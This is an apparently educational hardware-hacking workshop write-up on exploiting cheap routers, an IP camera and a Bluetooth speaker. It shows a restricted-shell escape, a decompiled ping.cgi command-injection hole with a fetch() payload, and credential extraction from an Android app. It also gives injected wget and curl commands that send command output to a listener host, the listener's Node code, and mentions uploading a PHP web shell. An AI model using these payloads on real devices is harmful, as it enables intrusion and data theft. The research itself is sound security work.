# Cheap Hardware (كيف تكون مجدلاوي 101) Welcome to my session Hardware hacking, in this session, we are going to explore some common tips and tricks in hardware hacking, and of course, we will try some hacks! ## Hacking D'Link DSL-225 First, let's begin with something simple! this router costs about 10NIS, which for a Linux machine is a great price deal! <center> ![D'Link DSL-225](https://i.imgur.com/9f8SyPD.png =300x) DSL-225 </center> Now let's turn on the router and play around with the control panel to see if something is interesting. <center> ![Remote management settings](https://i.imgur.com/Q46TNWr.png =400x) Remote Management Settings </center> Nice, we have SSH and Telnet 🥳 <center> ![Terminal](https://i.imgur.com/l8pl03g.png =400x) Custom D'Link terminal </center> يا فرحة ما تمت، this is a custom shell which doesn't allow us to control the whole machine 😟. Wait.. we have some commands like `ping` and `echo`, let's try to inject them! <center> ![Horry, `ls` executed](https://i.imgur.com/tDjI3cL.png) Horry, `ls` executed </center> Now, we can execute any Linux command, we could also run `bash`, by writing the following command `echo $(bash >&2)`, which redirects the stdout of bash to stderr so we could see it live! Notice that this is a Linux machine that has a USB port, imagine what you could do with it! **Bonus: If a system is using Linux it should publish its source code modifications under GPL license, you could download the kernel, file system and more from the internet!** So I've compiled the firmware with USB audio support and installed the needed applications and libraries, so now the router could play sound 😁 ## Hacking Netgear DGN2200 <center> ![Netgear DGN2200](https://i.imgur.com/1KJS9UG.png) Netgear DGN2200 </center> In this example, we are going to dive a little bit into firmware reverse engineering, the first tool you should know about is the awesome `binwalk` tool, which will walk through the binary and give you hits about what is inside the firmware, and more! <center> ![Binwalk output](https://i.imgur.com/7c7Xabn.png =500x) Binwalk output </center> Notice that we have a `JFFS2` file system, we could use `jefferson` to extract it, or run `binwalk -e $FILE_NAME`. <center> ![File System](https://i.imgur.com/l4T7NbG.png =500x) Tada: Now we have the file system </center> Now I've noticed that there are some diagnostics tools in the control panel, one of them is `ping`, let's search for `ping.cgi` which is the page that does that. You can use `grep` to search for a text recursively. ```bash grep "ping.cgi" -r . ``` <center> ![Grep output](https://i.imgur.com/VKEXzT3.png) Grep output </center> So we have the binary `httpd`, which is an HTTP server, Let's reverse engineer it using `Ghidra`, and look for that page code! ```cpp= undefined4 FUN_0041cc90(undefined4 param_1,undefined4 param_2) { undefined1 *puVar1; undefined local_210; undefined auStack527 [255]; char acStack272 [256]; puVar1 = &_mips_gp0_value; local_210 = 0; memset(auStack527,0,0xff); websGetVar(param_1,"ping_IPAddr",&local_210); sprintf(acStack272,"ping -c 4 %s > %s",&local_210,"/tmp/diag.conf",puVar1); system(acStack272); sendPage2Client("DIAG_ping.htm",param_2); return 0; } ``` Notice that the ping uses `system` library function which will execute the string as a shell script, and there's no validation at all! Now you can execute any command you like ;) ```javascript= fetch("http://10.0.0.138/ping.cgi", { "body": "ping_IPAddr=;ls -la", "method": "POST", }); ``` ## Hacking Piper Bhome Camera <center> ![Piper Bhome](https://i.imgur.com/s8c2359.png =150x) Piper Bhome </center> In this example, we will follow another approach, as we don't have the original firmware, or a control panel for the device, what we have is a mobile application that let us configure the camera. Now, the first thing that you should notice is that the camera creates a wifi hotspot, after connecting to it, you will find that the camera will have the IP `10.10.10.10`, which has an `HTTPS` server running. opening the page on the browser indicates that there's a user and a password for it! let's start analyzing the `apk` using `jadx`! After loading the app, start looking for things you know, for example, the IP of the camera. <center> ![Search Results](https://i.imgur.com/cgZXRm4.png) Search Results </center> ```java= public String a() { return "10.10.10.10"; } public int b() { return 443; } public String c() { return "https"; } public a a(String str) { if (str != null) { String[] split = str.split(":"); a("Authorization", Credentials.basic(split[0], split[1])); } return this; } ``` So here is what I found in that class, one of the most interesting sections right now is the `Authorization` header, let's see the references to `a` method. ```java= private a a(String str, DeviceApiRequest.Callbacks callbacks) { return new a(this.f156a, str, callbacks).a(this.f156a.D()); } public a a(DeviceApiRequest.Callbacks callbacks) { return a("/wifi/networks", callbacks); } public a b(DeviceApiRequest.Callbacks callbacks) { a a2 = a(String.format(Locale.ENGLISH, "/nodes/set/%d", new Object[]{256}), callbacks); a2.a(JSONRequest.HttpMethod.POST); HashMap hashMap = new HashMap(); hashMap.put("value", String.format( Locale.ENGLISH, "inject date \" && date -s @%s && echo\"", new Object[]{String.valueOf(System.currentTimeMillis() / 1000)} )); a2.b(new JSONObject(hashMap)); return a2; } ``` Now method `a` got its value from `this.f156a.D()`, but the method `a b(DeviceApiRequest.Callbacks callbacks)` has something interesting, it's a Linux command! ```java= public String D() { byte[] b2 = com.blacksumac.piper.util.e.b( this.r, this.r.getString(R.string.setup_credentials).getBytes() ); if (b2 != null) { return new String(b2); } o.error("SETUP CREDENTIALS ARE NULL!"); return null; } ``` Now just follow the code and get your credentials ;) ```json= { "data": null, "result_message": "HELLO", "device_id_hash": null, "api_version": "0.9.5", "serial_number": "CAB16480445", "hardware_revision": "VR", "software_version": "1.5.4", "machine_arch": "piper-nv" } ``` Nice, now we are logged in! let's return to the code with the command and send that request with this payload: `{"value": "inject date \" && date -s @1670016277 && wget http://10.10.10.100:8000 \""}` After starting an HTTP server, it works and I have received the request! **Usually I will use Netcat, but unfortunately it's not installed on the camera** Now I created a simple HTTP server, which will receive the output of the commands I execute ```javascript= var http = require('http'); var express = require('express'); var app = express(); app.use(express.raw({type: "*/*"})); app.use((req, res, err) => { console.log("--------------"); console.log(req.body.toString() ); console.log("--------------"); res.sendStatus(200); }); var server = http.createServer(app); server.listen(3000); ``` Now sending this payload will send the `ls` result as a post request to my server! `{"value": "inject date \" && date -s @1670016277 && curl -X POST http://10.10.10.100:3000 -d \"$(ls -la)\"\""}` <center> ![Tada](https://i.imgur.com/7cinZYm.png) Tada: The result of `ls` </center> I've noticed that there is a `php` file, so I've just uploaded a php terminal emulator to make my life easier! ## Hacking a Chinese Bluetooth speaker! <center> ![Bluetooth Speaker](https://i.imgur.com/JLvunZJ.png =250x) Bluetooth Speaker </center> Sorry won't cover it in many details, but a lot of cheap speakers come from the same factory, and you could find the original SDK of that factory. What you will have to do is to create a specific signal (Using any microcontroller), which will let the speaker enters the programming mode, then you could compile anything you like and upload it to the speaker! ## Last Tip If you couldn't execute anything, or couldn't find any exploit, there is always a way, first try to connect to the device using a serial port (using a USB to TTL converter), or you could read the flash using a programmer and analyze it! **<center>Thanks all ;)<center>**